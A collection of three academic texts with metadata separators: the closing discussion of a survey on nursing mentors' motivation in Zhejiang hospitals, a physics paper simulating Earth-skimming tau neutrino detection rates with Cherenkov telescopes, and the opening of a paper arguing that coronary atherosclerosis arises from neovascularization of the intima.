Our results indicated that the probability of higher motivation scores among nursing mentors varied with their experience and the type of hospital in which they worked. It is also essential to recognize that the probability of achieving higher motivation scores was not consistent across mentorship experience levels; mentors with more experience may need specific interventions to maintain their motivation. The frequency of psychological care provided by hospitals was a crucial factor affecting nursing mentoring motivation, attitude, and practice scores. Moreover, participation in training significantly affected the practice scores of nursing mentors, as did the frequency of evaluation, underlining the importance of providing mentors with the necessary support and training to enhance their practice and thereby increase the quality of nursing mentorship [14]. To improve clinical practice in nursing mentorship, it is crucial to recognize the significance of mentor experience, the role of hospitals, and the need for ongoing training and support [15,16]. By implementing targeted initiatives, healthcare institutions can enhance the quality of clinical nursing mentorship, ultimately contributing to the development of a skilled and motivated nursing workforce [17,18]. The responses in the motivation dimension reveal nurses' attitudes towards mentoring new nurses/interns. Nurses have diverse motivations for mentoring; for instance, some saw mentoring as a means of advancing their careers, while others did it out of a sense of duty to the organization. One way to improve clinical practice could be to encourage nurses to view mentoring as an opportunity for professional growth rather than just a responsibility [19,20]. This shift in mindset may lead to more engaged and effective mentoring, ultimately benefiting both mentors and mentees.
The attitude dimension clarifies how the nursing mentor system is perceived and how it affects work-life balance. Many respondents believed mentoring could help with scheduling coordination, work-family balance, and relationships between new nurses/interns and colleagues; however, they also had concerns about the time and effort required for mentoring. One way to enhance clinical practice is to emphasize the potential benefits of mentoring, such as the development of relationships and the discovery of talent [21,22]. Institutions could provide resources and support to help mentors manage their time effectively, ensuring that mentoring does not become overly burdensome [23,24].
The practice dimension focuses on the actions and behaviors of mentors during the mentoring process. Respondents were willing to adjust their guidance methods, seek help when needed, and continuously enhance their nursing knowledge. However, some expressed occasional impatience, and conflicts between mentoring and clinical work were not uncommon. The comprehensive evaluation of new nurses/interns involves various aspects, including hands-on ability, communication ability, work attitude, learning ability, and creative spirit, and the weight assigned to these aspects varied among mentors. To improve clinical practice, it is essential to provide mentors with training and resources to manage mentoring challenges while maintaining their own clinical responsibilities [25]. Additionally, emphasizing the importance of patience, constructive guidance, and clinical exposure for new nurses/interns can promote a more positive mentoring experience [26,27]. It is also recommended that standardized evaluation criteria be developed based on a balanced assessment of these attributes [28].
Our results revealed significant positive correlations among the motivation, attitude, and practice scores in nursing mentorship. Specifically, nurses who exhibited higher levels of motivation were more likely to maintain positive attitudes toward mentoring, and those with positive attitudes were more likely to demonstrate effective mentoring practices. This interconnectedness underscores the importance of nurturing motivation among mentors, as it serves as a catalyst for fostering constructive attitudes and productive mentorship practices [29,30]. Healthcare institutions should recognize the holistic nature of mentorship and aim to create an environment that encourages and sustains motivation, while also providing mentorship training and support to enhance attitudes and practices [31,32].
By examining nursing mentors' motivations, attitudes, and practices, this study furthered the understanding of clinical nursing mentorship in Zhejiang Province, China. Its focus on an economically developed region provided insight into how regional factors influence mentorship, a topic not widely covered in previous research. The study also highlighted the importance of mentor training, psychological care, and structured mentorship activities, offering practical suggestions for improving mentorship programs.
The present study has some limitations, including its regional focus and sampling method. The reported findings, based solely on data from Zhejiang Province, may not apply to areas with different economic and cultural settings. In addition, the sample, drawn from 30 hospitals in one province, might not fully represent all nursing mentors, potentially affecting the generalizability of the results. Therefore, while the study provides valuable regional insights, its applicability to other contexts is limited. Future research could benefit from a broader geographical range and more diverse sampling to better represent the experience of nursing mentors.

In conclusion, clinical nursing mentors had adequate motivation, positive attitudes, and proactive practice towards mentoring. Our results underscore several key recommendations for enhancing clinical nursing mentorship in practice. First, institutions should prioritize mentorship training programs to bolster clinical nursing mentors' motivation, attitude, and practice, especially for those in intermediate and senior roles. Additionally, fostering a supportive institutional environment in which psychological care is consistently provided can positively affect nursing mentors' motivation, attitude, and practice. Moreover, addressing concerns and providing structured mentorship activities for individuals with lower probability ratings can significantly improve the quality and efficacy of mentorship in nursing.
Table 1
Participants' baseline information and distribution of motivation, attitude, and practice scores
Table 2
Responses to motivation dimension
Table 3
Responses to attitude dimension
Table 4
Responses to practice dimension
Table 5
Correlation of scores on the dimensions of motivation, attitude and practice
Table 6
Logistic regression analysis of the dimensions of motivation, attitude, and practice | 2024-01-31T06:17:07.544Z | 2024-01-30T00:00:00.000 | {
"year": 2024,
"sha1": "86bd0b09c9b8099fd29746062f1e55778c717fd2",
"oa_license": "CCBY",
"oa_url": null,
"oa_status": null,
"pdf_src": "PubMedCentral",
"pdf_hash": "55292a21cbb1b70c4b85c2ab2b2e3b1f35461dce",
"s2fieldsofstudy": [
"Education",
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
117909360 | pes2o/s2orc | v3-fos-license | Tau neutrino search with Cherenkov telescopes
Cherenkov telescopes could have the capability of detecting high energy tau neutrinos by searching for very inclined showers. If a tau lepton, produced by a tau neutrino, escapes from the Earth's crust, it will decay and initiate an air shower which can be detected by a fluorescence/Cherenkov telescope. Here we present a detailed Monte Carlo simulation of event rates induced by tau neutrinos in the energy range from 1 PeV to 1 EeV. Topographic conditions are taken into account for a set of example locations. As expected, we find a neutrino sensitivity which depends on the shape of the energy spectrum of astrophysical sources. We compare our findings with the sensitivity of the dedicated IceCube neutrino telescope under different conditions. We also find that differences of several factors can arise depending on the topographic conditions of the sites sampled.
Introduction
Many models which try to explain the origin of ultra high energy cosmic rays (UHECR) claim that they might be produced by Active Galactic Nuclei (AGN) and Gamma Ray Bursts (GRB). Most of these models also predict a significant flux of high energy neutrinos from the decay of charged pions. The chance of discovering extraterrestrial signals (neutrinos) from these objects varies considerably with source class and model prediction. Concerning blazars, for example, in [1] Flat Spectrum Radio Quasars (FSRQ) are considered more promising than BL Lac objects, whereas in [2] the opposite is predicted. The proton blazar model [3] predicts that Low synchrotron peaked BL Lacs (LBL) are more likely to produce significant neutrino emission than High synchrotron peaked BL Lacs (HBL). On the other hand, in [1] the considered p-γ model leads to the conclusion that FSRQs bright in the GeV range are promising neutrino sources, without any assumption on the spectral index.
From this point of view, detection of individual flares from AGNs on the time scale of days or weeks can be more or less feasible for cubic-kilometer scale neutrino telescopes like IceCube, depending on the predictions for the mechanism yielding the observed electromagnetic emission at high energies.
The highest energy neutrinos are expected to be born as muon and electron neutrinos, but due to vacuum oscillations the flux of high energy cosmic neutrinos at Earth is expected to be almost equally distributed among the three neutrino flavors. Due to their low interaction probability, neutrinos need to interact with a large amount of matter in order to be detected. The atmosphere and the Earth offer such a target. Since the Earth is not transparent to neutrinos at the highest energies, one detection technique is based on the development of extensive air showers (EAS) in the atmosphere. In air, very inclined EAS can be detected only by instruments observing a large volume. Of neutrinos propagating through the Earth, only the so-called Earth-skimming tau neutrinos may initiate detectable air showers above the ground. Successful detection of such showers requires a ground array detector with a large acceptance, of the order of one km², and great sensitivity to horizontal showers, such as the Pierre Auger Observatory, which is sensitive to tau neutrinos in the EeV energy range [4]. However, the detection of PeV tau neutrinos (expected to be produced by AGNs and GRBs) through optical signals would also seem to be possible: a combination of fluorescence and Cherenkov light detectors in the shadow of a steep cliff could achieve this goal [5]. Recently, it was also shown that such experiments could be sensitive to tau neutrinos from fast transient objects like nearby GRBs [6].
In this work we investigate the detection of high energy tau neutrinos in the energy range from PeVs to EeVs by searching for very inclined showers using Cherenkov telescopes. We have performed detailed Monte Carlo (MC) simulations of expected tau neutrino event rates, including local topographic conditions, for La Palma, i.e. the location of the MAGIC telescopes [7], and for a sample of sites proposed for the Cherenkov Telescope Array (CTA) [8]. Results are shown for a few representative neutrino fluxes expected for giant flares from AGNs.
Method
The propagation of a given neutrino flux through the Earth and the atmosphere is simulated using an extended version of the code ANIS [9].
For fixed neutrino energies, 10⁶ events are generated on top of the atmosphere with zenith angles (θ) in the range 90°-105° (up-going showers) and with azimuth angles in the range 0°-360°. Neutrinos are propagated along their trajectories of length ΔL from the generation point on top of the atmosphere to the back side of the detector in steps of ΔL/1000 (≥ 6 km). At each step of the propagation, the ν-nucleon interaction probability is calculated according to different parametrizations of its cross section, based on the chosen parton distribution function (PDF). In particular, the propagation of tau leptons through the Earth is simulated with different energy loss models. All computations are done using digital elevation maps (DEM) [10] to model the surrounding mass distribution of each considered site. The acceptance for a given initial neutrino energy E_ντ is given by:

A(E_ντ) = (1/N_gen) × Σ_{i=1}^{N_k} P(E_ντ, E_τ, θ) × A_i(θ) × T_eff(E_τ, x, y, h, θ) × ΔΩ, (1)

where N_gen is the number of generated neutrino events and N_k is the number of τ leptons with energy E_τ larger than the threshold E_th > 1 PeV and with decay vertex position inside the detector volume. P(E_ντ, E_τ, θ) is the probability that a neutrino with energy E_ντ crossing the distance Δl produces a tau lepton with energy E_τ (this probability is used as the "weight" of the event), A_i(θ) is the cross-sectional area of the detector volume seen by the neutrino, and ΔΩ is the solid angle. T_eff(E_τ, x, y, h, θ) is the trigger efficiency for tau lepton induced showers with first interaction position (x, y) and height h above the ground. The trigger efficiency depends on the response of a given detector and is usually estimated from MC simulations. In this work we used an average trigger efficiency extracted from [6], namely T_eff = 10%, which is comparable with that calculated for the up-going tau neutrino showers studied in [5]. This is a qualitative estimate and, as such, is the major source of uncertainty on the results presented hereafter.
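To make the weighted-sum structure of Eq. (1) concrete, here is a schematic Monte Carlo estimator. The real calculation (ANIS propagation, elevation maps, tau energy loss) is replaced by toy stand-ins: the per-event weights, areas, and selection flags below are placeholder distributions, not values from the paper.

```python
import numpy as np

rng = np.random.default_rng(42)
N_GEN = 10**6            # generated neutrinos on top of the atmosphere
T_EFF = 0.10             # average trigger efficiency assumed in the text
D_OMEGA = 2 * np.pi * (np.cos(np.radians(90)) - np.cos(np.radians(105)))  # ~1.626 sr

# Toy stand-ins: per-event nu -> tau conversion probability ("weight"),
# cross-sectional detector area seen at the event's zenith angle, and a
# flag for tau decays inside the detector volume with E_tau > 1 PeV.
weights = rng.uniform(0.0, 1e-4, N_GEN)          # P(E_nu, E_tau, theta)
areas_km2 = rng.uniform(0.5, 5.0, N_GEN)         # A_i(theta)
passes = rng.random(N_GEN) < 1e-3                # decay vertex + energy cut

# Eq. (1): sum over the N_k accepted events only, normalized by N_gen.
acceptance = (weights[passes] * areas_km2[passes] * T_EFF).sum() * D_OMEGA / N_GEN
print(f"A(E_nu) ~ {acceptance:.3e} km^2 sr")
```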
Eq. (1) gives the acceptance for diffuse neutrinos. The acceptance for a given point source can be estimated as the ratio between the diffuse acceptance and the solid angle covered by the diffuse analysis, multiplied by the fraction of time f_vis(δ_s, φ_site) during which the source is visible within the aperture defined at the beginning. This fraction depends on the source declination (δ_s) and the latitude of the observing site (φ_site). In this work the point source acceptance is therefore calculated as:

A_PS(E_ντ) = A(E_ντ)/ΔΩ × f_vis(δ_s, φ_site). (2)

In Figure 2 a compilation of fluxes expected from AGN flares is shown. Flux-1 and Flux-2 are calculations for the February 23, 2006 γ-ray flare of 3C 279 [11]. Flux-3 and Flux-4 are predictions for PKS 2155-304 in its low state and high state, respectively [12]. Flux-5 corresponds to a prediction for 3C 279 calculated in [13]. The flux labeled GRB corresponds to the recent limit on the neutrino emission from GRBs reported by the IceCube Collaboration [14].
The total observable rates (numbers of expected events) were calculated as

N = ΔT × ∫ A_PS(E_ν) × Φ(E_ν) dE_ν,

where Φ(E_ν) is the neutrino flux and ΔT an arbitrary observation time (3 hours in Table 1). The rates in Table 1 were calculated assuming the GRV98lo [18] cross-section, with f_vis = 100%, ΔΩ = 2π(cos(90°) − cos(105°)) = 1.6262 sr, and ΔT = 3 hours, using the point source acceptances shown in Figure 3. Figure 3: Acceptance A_PS(E_ντ) to Earth-skimming tau neutrinos as estimated for the La Palma site and a sample selection of CTA sites (with a trigger efficiency of 10%), and for IceCube (with the correct efficiency, as extracted from [15]).
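The rate integral above can be evaluated numerically once A_PS(E) and Φ(E) are tabulated on an energy grid; a minimal sketch follows. The power-law flux normalization and the acceptance curve are placeholders chosen for illustration, not values from the cited models.

```python
import numpy as np

# Energy grid from 1 PeV to 1 EeV (in GeV)
E = np.logspace(6, 9, 200)

# Placeholder inputs: a power-law point-source flux and a toy acceptance curve.
phi = 1e-7 * (E / 1e6) ** -2        # GeV^-1 cm^-2 s^-1 (assumed normalization)
A_ps = 2e-3 * (E / 1e6) ** 0.5      # km^2 (assumed shape)

DT = 3 * 3600.0                      # 3-hour observation window, in seconds
KM2_TO_CM2 = 1e10                    # unit conversion so A * phi is in s^-1 GeV^-1

# N = dT * integral of A_PS(E) * Phi(E) dE, via the trapezoidal rule
rate = DT * np.trapz(A_ps * KM2_TO_CM2 * phi, E)
print(f"expected events in 3 h: {rate:.2e}")
```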
Results
A clear correlation can be observed between the expected rate and the local topography, i.e. the expected number of events from the South-East is usually larger than from other directions, due to the larger amount of matter encountered by neutrinos arriving from the South-East. For tau lepton energies between 10¹⁶ eV and 10¹⁷ eV the decay length is a few kilometers, so detectable events should mainly come from the local hills of La Palma island when considering the location of MAGIC, while for tau lepton energies between 10¹⁸ eV and 10¹⁹ eV the decay length is larger than 50 km, so the matter distribution of the other Canary Islands can also contribute slightly. In Figure 3 we show the estimated point source acceptance for the La Palma site and other possible locations as a function of the neutrino energy, together with the IceCube acceptance as extracted from [15]. We stress at this point that we aim at exploring the effect of different topographic conditions rather than providing a comprehensive survey of potential sites.
The IceCube acceptance increases for energies between 10⁶ GeV and 10⁹ GeV, and is on average about 2 × 10⁻³ km². A potential detector located in La Palma with an average trigger efficiency of 10% can have an acceptance up to a factor of 5 greater than IceCube (Northern Sky) at energies larger than ∼ 5 × 10⁷ GeV. Indeed, for neutrino fluxes covering the energy range below ∼ 5 × 10⁷ GeV (Flux-1, Flux-2, Flux-5 and GRB), the number of expected events is smaller than that estimated for IceCube assuming 3 hours of observation time. However, even in this energy range (see Table 1) similar rates could be obtained with a trigger efficiency increased by a factor of 2-3 compared to the rough estimate of 10%. For Flux-3 and Flux-4 the event rate is about a factor of 2 larger than the realistic rate calculated for IceCube (Northern Sky). This indicates that Cherenkov telescopes could have a sensitivity comparable to or even greater than that of neutrino telescopes such as IceCube in the case of short neutrino flares (i.e. with a duration of about a few hours); for longer durations, the advantage of neutrino telescopes as full-sky, no-dead-time instruments becomes relevant. An accurate simulation of the neutrino trigger efficiency for realistic Cherenkov telescopes is, however, needed. Table 1 also shows that for a GRB flux at the level of the current IceCube limit, a trigger efficiency larger by at least a factor of 10 compared to what we assumed here would be needed.
Another interesting possibility for the detection of up-going tau neutrinos is to build Cherenkov detectors at sites surrounded by mountains. Mountains can act as an additional target, leading to an enhancement of the number of emerging tau leptons; a target mountain can also function as a shield against cosmic rays and starlight.
In order to estimate the possible influence of mountains on the calculated event rate for up-going tau neutrinos, we performed a simulation similar to that done for the La Palma site for four sample locations: two in Argentina (San Antonio, El Leoncito), one in Namibia (Kuibis) and one in the Canary Islands (Tenerife), see Table 2 and Figure 4. For sites surrounded by mountains (San Antonio, El Leoncito, Kuibis), the results show a higher event rate (by at least a factor of 2) than for sites without surrounding mountains (La Palma and Tenerife). We also studied the influence on the expected event rate of uncertainties in the tau lepton energy loss. The average energy loss of taus per distance travelled (in units of depth X in g/cm²) can be described as

dE/dX = α(E) + β(E)E.

The factor α(E), which is nearly constant, is due to ionization; β(E) is the sum of e⁺e⁻-pair production and bremsstrahlung, which are both well understood, and photonuclear scattering, which is not only the dominant contribution at high energies but also subject to relatively large uncertainties. In this work the factor β_τ is calculated using the following models describing the contribution of photonuclear scattering: ALLM [16], BB/BS [22] and CMKT [23], and different neutrino-nucleon cross-sections: GRV98lo [18], CTEQ66c [17], HP [19], ASSS [20], ASW [21]. Results are listed in Table 2 for Flux-1 and Flux-3.

Table 3: Relative contributions to the systematic uncertainties on the up-going tau neutrino rate. As a reference value, the expected event rate for the La Palma site calculated for Flux-1 (Flux-3 in brackets) was used; the reference rate is 2.8 × 10⁻⁴ (8.6 × 10⁻⁵).

          PDF           β_τ            sum
upper:    +14% (+42%)   +2% (+7%)      +14% (+43%)
lower:    -2% (-7%)     -7% (-14%)     -7% (-16%)
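The continuous energy-loss equation dE/dX = α(E) + β(E)·E can be integrated numerically to propagate a tau through rock; the sketch below does this with a simple Euler step. The constant values of α and β are placeholder magnitudes (the cited models give energy-dependent values), and tau decay in flight is ignored.

```python
ALPHA = 2.0e-3   # GeV cm^2/g, ionization term (placeholder magnitude)
BETA = 0.8e-6    # cm^2/g, radiative + photonuclear term (placeholder magnitude)
RHO_ROCK = 2.65  # g/cm^3, standard rock density

def propagate_tau(E0_gev: float, distance_km: float, steps: int = 10000) -> float:
    """Integrate dE/dX = alpha + beta*E over a column of standard rock."""
    dX = distance_km * 1e5 * RHO_ROCK / steps   # depth step in g/cm^2
    E = E0_gev
    for _ in range(steps):
        E -= (ALPHA + BETA * E) * dX
        if E <= 0:
            return 0.0
    return E

# A 10^8 GeV tau crossing 5 km of rock retains roughly exp(-beta * X) of its
# energy, about 35% with these placeholder values.
print(f"E_tau after 5 km of rock: {propagate_tau(1e8, 5.0):.3e} GeV")
```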
Summary
In this paper detailed Monte Carlo simulation of event rate, including local topographic conditions of the detector, and using recent predictions for neutrino fluxes in AGN flares are presented for La Palma site and a few proposed CTA sites. The calculated neutrino rate is usually worse compared to what estimated for IceCube assuming realistic observation times spend by Cherenkov telescopes (a few hours). However for models which predict neutrino fluxes with energy above ∼ 5 × 10 17 eV, the sensitivity can be comparable to IceCube or even better. For the sites considered which have surrounding mountains the expected event rate is up to factor 5 higher compared to what expected for La Palma. | 2013-08-01T13:40:24.000Z | 2013-08-01T00:00:00.000 | {
"year": 2013,
"sha1": "3b8c824c885121861081f4cf5d6ec01f0a0fb7e4",
"oa_license": null,
"oa_url": null,
"oa_status": null,
"pdf_src": "Arxiv",
"pdf_hash": "ebcf004ff41cc70f2cf8a6eab201fb833ebe8750",
"s2fieldsofstudy": [
"Physics"
],
"extfieldsofstudy": [
"Physics"
]
} |
255961590 | pes2o/s2orc | v3-fos-license | Neovascularization of coronary tunica intima (DIT) is the cause of coronary atherosclerosis. Lipoproteins invade coronary intima via neovascularization from adventitial vasa vasorum, but not from the arterial lumen: a hypothesis
An accepted hypothesis states that coronary atherosclerosis (CA) is initiated by endothelial dysfunction due to inflammation and high levels of LDL-C, followed by deposition of lipids and macrophages from the luminal blood into the arterial intima, resulting in plaque formation. The success of statins in preventing CA promised much for extended protection and effective therapeutics. However, stalled progress in pharmaceutical treatment gives a good reason to review logical properties of the hypothesis underlying our efforts, and to reconsider whether our perception of CA is consistent with facts about the normal and diseased coronary artery. To begin with, it must be noted that the normal coronary intima is not a single-layer endothelium covering a thin acellular compartment, as claimed in most publications, but always appears as a multi-layer cellular compartment, or diffuse intimal thickening (DIT), in which cells are arranged in many layers. If low density lipoprotein cholesterol (LDL-C) invades the DIT from the coronary lumen, the initial depositions ought to be most proximal to blood, i.e. in the inner DIT. The facts show that the opposite is true, and lipids are initially deposited in the outer DIT. This contradiction is resolved by observing that the normal DIT is always avascular, receiving nutrients by diffusion from the lumen, whereas in CA the outer DIT is always neovascularized from adventitial vasa vasorum. The proteoglycan biglycan, confined to the outer DIT in both normal and diseased coronary arteries, has high binding capacity for LDL-C. However, the normal DIT is avascular and biglycan-LDL-C interactions are prevented by diffusion distance and LDL-C size (20 nm), whereas in CA, biglycan in the outer DIT can extract lipoproteins by direct contact with the blood. These facts lead to the single simplest explanation of all observations: (1) lipid deposition is initially localized in the outer DIT; (2) CA often develops at high blood LDL-C levels; (3) apparent CA can develop at lowered blood LDL-C levels. This mechanism is not unique to the coronary artery: for instance, the normally avascular cornea accumulates lipoproteins after neovascularization, resulting in lipid keratopathy. Neovascularization of the normally avascular coronary DIT by permeable vasculature from the adventitial vasa vasorum is the cause of LDL deposition and CA. DIT enlargement, seen in early CA and aging, causes hypoxia of the outer DIT and induces neovascularization. According to this alternative proposal, coronary atherosclerosis is not related to inflammation and can occur in individuals with normal circulating levels of LDL, consistent with research findings.
Background
Atherosclerosis, the predominant cause of coronary artery disease, remains enigmatic. Despite best efforts, available therapies protect only 30-40% of individuals at risk, and no therapeutic cure is anticipated for those who currently suffer from the disease. Delayed progress concerning pharmaceutical treatment implies that atherosclerosis drug development is in jeopardy, raising concerns among experts [1].
This analysis addresses the logical properties of the hypothesis underlying our efforts, and reconsiders whether our perception of the disease is consistent with undisputed facts concerning coronary arteries in general and during disease in particular. A different perspective on the pathogenesis of atherosclerosis is proposed.
Logical properties and factual consistency concerning a currently endorsed hypothesis relating to coronary atherosclerosis: common perception of coronary artery morphology A currently endorsed hypothesis is based on the following assumptions: (1) atherosclerosis is a systemic disease, initiated by endothelial dysfunction due to (2) inflammation and (3) high levels of LDL, (4) leading to lipid and macrophage deposition in the tunica intima from blood of the coronary lumen, and plaque formation (modified response-to-injury hypothesis) [2,3]. This perception is presented in mainstream scientific publications and in educational materials, whether printed or electronic. The hypothesis is typically accompanied by familiar schematics depicting the pathogenesis of coronary atherosclerosis and the transition from a normal cardiac artery to a diseased state (e.g. Figure 1). This perception of the mechanism of disease, and similar schematics, appear in well-recognized scientific journals including Nature Medicine and Arteriosclerosis, Thrombosis, and Vascular Biology (e.g. [5]), and in common educational materials such as the Britannica Online Encyclopaedia (Figure 2). Therefore, this explanatory model concerning atherosclerosis, and accompanying schematics indistinguishable from that outlined above, are available in the majority of scientific publications and educational materials [2][3][4][5][6].
Assumption: atherosclerosis is an inflammatory disease
A variety of microorganisms are present in advanced atherosclerotic lesions, for example in specimens removed during atherectomy [7]. Fabricant et al. induced visible atherosclerotic changes in chicken coronary arteries resembling those in humans by infecting the birds with a herpesvirus [8][9][10], and suggested a viral role in pathogenesis, a view shared by many scientists (for review see [11,12]). Mycoplasma pneumoniae or Chlamydia pneumoniae infections alone [13], or together with influenza virus [14], have been proposed as contributory factors in the pathogenesis of atherosclerosis, particularly through participation in obstruction of the vasa vasorum [11]. However, these cases probably do not indicate the initiation of atherosclerosis, but are more likely to represent secondary infection of degenerating/necrotic tissue. It should be emphasized that neither non-steroidal anti-inflammatory nor antibacterial treatments alter the risk of coronary atherosclerosis [15][16][17][18]. Despite the aforementioned studies [7-11,13,14], therefore, it can reasonably be claimed that no infectious cause of atherosclerosis has been demonstrated [19,20].
Assumption: a high level of LDL initiates and is the main cause of atherosclerosis

High levels of LDL are an important risk factor, and lowering LDL levels is the most significant pharmaceutical tool in coronary atherosclerosis prevention. However, the statement that high levels of LDL are the main cause of coronary atherosclerosis is inconsistent with established medical concepts.
Inconsistency with the established concept in medicine

"Indeed, proof that a given condition always precedes or accompanies a phenomenon does not warrant concluding with certainty that a given condition is the immediate cause of that phenomenon. It must still be established that when this condition is removed, the phenomenon will no longer appear…" Claude Bernard [21].
As has been emphasized by numerous scientists, multiple factors participate during disease development, and can affect the progression and severity of disease. However, only through distinguishing the cause from all contributing factors can an effective cure, leading to disease eradication, be achieved.
". . . differentiating between cause and non-causative factors is essential. Elimination of the latter only ameliorates or reduces the incidence whereas elimination of the former eradicates the disease. Swamps are not a cause of malaria. Draining swamps may reduce the incidence of malaria but it is eradication of the malarial parasites that eliminates the disease. Reduction in incidence rather than elimination of the disease precludes a causal relationship." W. E. Stehbens [22]. Therefore, the fact that lowering LDL levels does not prevent cardiac events in 60-70% of individuals at risk [23] contradicts the causative role of LDL. Unfortunately, it appears that the scientific and medical communities are focusing on and emphasizing biomarkers that can predict risk, without proof that these biomarkers cause the risk [24,25].
The study of disease mechanisms is a young scientific field. Although well-recognized concepts are not always proved correct, the author believes that a new hypothesis should not contradict established concepts that have been proven as far as possible, without informed reasoning.
Factual discrepancies

Lipid/macrophage pathogenesis of arteriosclerosis was suggested approximately one hundred years ago [26]. However, the hypothesis only gained proper attention during the 1970-80s, after a report concerning the Framingham Heart Study [27], culminating in the joint NIH and American Heart Association publication of a Special Report [28], which was reprinted in all relevant journals [29][30][31][32][33]. The first Panel's Conclusion of the Report states: "Elevation of blood cholesterol levels is a major cause of coronary artery disease".
At approximately the same time, effective hypolipidemic drugs were developed and introduced into clinics, and the American Heart Association predicted that lowering blood cholesterol would almost eliminate the requirement for bypass surgery and eradicate coronary arteriosclerosis by the end of the 20th century [5,34]. It is now known that HMG-CoA reductase inhibitors, the cholesterol-lowering drugs known as "statins", are almost 100% effective in lowering LDL in populations with high LDL-C levels, but normalizing LDL levels only reduces the risk of cardiovascular disease in this group by approximately 30-40% [23,[35][36][37][38], and the total number of coronary interventions (bypass and stenting operations) has increased significantly [39]. However, individuals with normal LDL-C levels suffer from coronary atherosclerosis, and although at lower risk, this includes vegetarians [40]. Numerous studies have demonstrated that coronary atherosclerosis affects all eutherian animals with a body mass comparable to or larger than humans, regardless of diet specialization and LDL levels [41][42][43][44][45]. Surprisingly, in these mammals, lipid accumulations in arterial walls were more common in herbivores than in carnivores [43,46]. The lack of association between total or LDL cholesterol and the degree of atherosclerosis in unselected individuals was demonstrated by a study in the 1930s [47] and has since been noted by many others, notably W. E. Stehbens [48][49][50][51][52][53][54] and U. Ravnskov [55][56][57][58][59], among others, e.g. [60]. Therefore, the hypothesis that elevated blood cholesterol constitutes a major cause of coronary arteriosclerosis is questionable. Undoubtedly, high LDL levels are an important risk factor and a vital tool in CA prevention, but logically, it must be concluded that high LDL levels are not "a major cause" of coronary atherosclerosis.
Assumption: lipids act and invade coronary tunica intima from the arterial lumen
Factual discrepancies

If high levels of LDL-C affect and invade arterial walls from the arterial lumen (Figure 1), then the initial and most pronounced lipid accumulation in the arterial tunica intima ought to be most proximal to the coronary blood flow, i.e. within the inner layers of the tunica intima. However, detailed pathological studies of the early stages of human coronary atherosclerosis have demonstrated that the opposite is true, i.e. lipid deposits are initiated in the outer layers of the coronary tunica intima [61,62], termed the deeper musculoelastic layers (for morphological details and terms see [63]). A report published in 1968 described, although very briefly, the same morphological pattern in the early stages of human coronary atherosclerosis: initial lipid accumulation in the deepest intimal portion, followed by lipid deposition in the middle intimal zone [64]. This counterintuitive location of lipid deposition is very important for understanding the pathogenesis of coronary atherosclerosis, and I term this phenomenon the "outer lipid deposition paradox". Nakashima et al. explained the outer lipid deposition paradox by demonstrating that accumulation of the proteoglycan biglycan occurs predominantly in the outer layers of the tunica intima of both normal and diseased individuals, i.e. in the same location as the initial accumulation of lipids. Furthermore, Nakashima et al. suggested that biglycan possesses specific binding properties for atherogenic lipoproteins. They noted that structural changes in biglycan could increase its binding properties, and suggested a possible source of biglycan expression in agreement with previous reports [65,66]. Noting some discrepancy in patterning, i.e. that lipids deposit eccentrically whereas biglycan is localized concentrically [62], the authors elaborated these specifics in this and a later publication [67].
In addition to reporting significant findings on the precise location of lipid deposition during the initiation of coronary atherosclerosis, this work unequivocally demonstrates that the normal coronary tunica intima is not a single-layer endothelium covering a thin acellular compartment, as is commonly claimed in mainstream scientific publications and educational materials (e.g. Figures 1 and 2), but a multi-layer cellular compartment in which cells and matrix are arranged in a few dozen layers.
However, this is not a new discovery in coronary morphology. In 2002 Nakashima et al. published a complete morphological analysis of normal post-natal development of human coronary arteries, demonstrating that the epicardial coronary tunica intima invariably forms a multilayered cellular compartment, or diffuse intimal thickening (DIT) [68], known as normal arterial intimal hyperplasia [69]. Nakashima et al. [68] credited all previous reports concerning DIT in normal human coronaries, beginning with a famous publication by Richard Thoma in 1883 [70] and concluding with modern papers, e.g. [71]. These references could be supplemented with dozens of others demonstrating that the formation of DIT in normal coronaries is universal in humans. One particular publication, written by Dr. Kapitoline Wolkoff in 1923 [72], was pioneering in relation to the detailed morphology of post-natal human coronary ontogenesis. In her observations, the intimal structures (in German "Bindegewebsschicht" and "Elastisch-hyperplastische Schicht") above the lamina elastica interna correspond to DIT in the modern literature [63,67,68,73].
To my knowledge there are no definitive data concerning the number of cell layers forming DIT, which varies in formalin-fixed specimens owing to artery contraction in the fixative [63]. In addition to individual variation, the latter could explain the differences in DIT thickness between reports, e.g. [68,72,74]. It is therefore difficult to determine an exact number of cell layers in DIT, although extrapolating from all available reports it can be approximated as between 20-25 and 35-50 cell layers. Coronary artery DIT has been found in all studies of vertebrates with a body mass similar to or larger than humans (for review see [69]), beginning taxonomically with fishes [75]. Unfortunately, these fundamental facts have not been widely appreciated in medical research and education, which commonly operate on the assumption that the normal coronary arterial tunica intima is always an "ideal" single-layer endothelium covering an acellular compartment [4-6,76], or deny the presence of coronary DIT in animals [77].
Discussion
When considering coronary atherosclerosis, we inevitably focus on atherosclerotic plaques, their vulnerability and rupture, lipid and necrotic core, fibrous cap and thickness, as these features determine morbidity and mortality. However, these are features of advanced stages of the disease, and such lesions [78][79][80] are extremely resistant to therapeutics. Progress in plaque stabilization and regression has been reported, but the probability that these patients will require coronary intervention is very high (for review see [81]). This analysis concerns initiation and early stages of CA, which should be more receptive to therapeutics and are potentially reversible. In addition, initial tissue transformations are more informative in terms of elucidating mechanisms of disease, as later pathological formations (e.g. mature plaque) include significant secondary lesions, which could mask crucial features of disease pathogenesis.
An important part of this analysis is devoted to the consistency of the hypothesis that guides our efforts to understand coronary atherosclerosis, in relation to facts concerning normal coronary morphology and the diseased state. As demonstrated above, the morphology of human coronary arteries is not what is commonly claimed in analyses relating to coronary atherosclerosis, which underlie approaches to finding a cure. Unfortunately, this inaccurate perception of coronary artery morphology has led to hypotheses that imply that DIT is a dimensionally insignificant compartment, e.g. [4][5][6]. Furthermore, such depictions appear in articles that include micrographs of coronary artery histological slides demonstrating the real ratio between the coronary artery coats, e.g. [82]. Therefore, although the coronary tunica intima is a multi-layered cellular compartment equal to or thicker than the tunica media [62,63,67,68,70,72,[83][84][85], there is a common perception that the human coronary tunica intima is a one-cell layer covering a thin matrix layer [4-6,82,86]. Since this perception is very persistent in scientific publications and educational materials, I believe it is worthwhile to look for a reason for this misinterpretation.
Customary replies such as "it is just an unimportant visual (or verbal) schematic, but the foundation of the hypothesis is correct" are not convincing. A schematic that presents a hypothesis is the essence of the hypothesis; therefore, if the schematic is incorrect, the hypothesis must be incorrect too.
